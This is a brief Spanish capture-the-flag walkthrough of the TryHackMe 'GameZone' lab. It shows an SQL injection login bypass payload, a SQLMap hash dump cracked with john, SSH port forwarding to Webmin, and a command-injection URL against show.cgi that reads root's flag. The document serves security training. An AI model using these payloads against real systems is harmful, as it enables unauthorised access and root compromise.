TryHackMe Medium Linux SQLi SQLMap Webmin SSH Tunneling

GameZone

SQLi login bypass; hash dump con SQLMap crackeado con john; acceso Webmin via SSH port forwarding para RCE root.

cat4clysm
Herramientas utilizadas
nmap sqlmap john ssh netcat

Scanning

root@kali:~$
nmap -sC -sV -p 22,80 10.10.196.59 -oN targeted
nmap scan

SQLi - Login Bypass

La pagina de login es vulnerable a SQL injection:

Login: 'or 1=1 -- -
Password: ' or 1=1 -- -
login bypass portal logged in

SQLMap - Hash Dump

Interceptamos la peticion con Burp Suite y la pasamos a SQLMap:

burp request sqlmap
root@kali:~$
john hash --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256
cracked 
# password: videogamer124

SSH + Port Forwarding - Webmin

root@kali:~$
ssh [email protected]
# password: videogamer124
root@kali:~$
ss -tulpn
ports
root@kali:~$
ssh -L 10000:localhost:10000 [email protected]
webmin exploit read

RCE en Webmin via /file/show.cgi:

http://localhost:10000/file/show.cgi/bin/7|cat /root/root.txt|
rce webmin

Lecciones aprendidas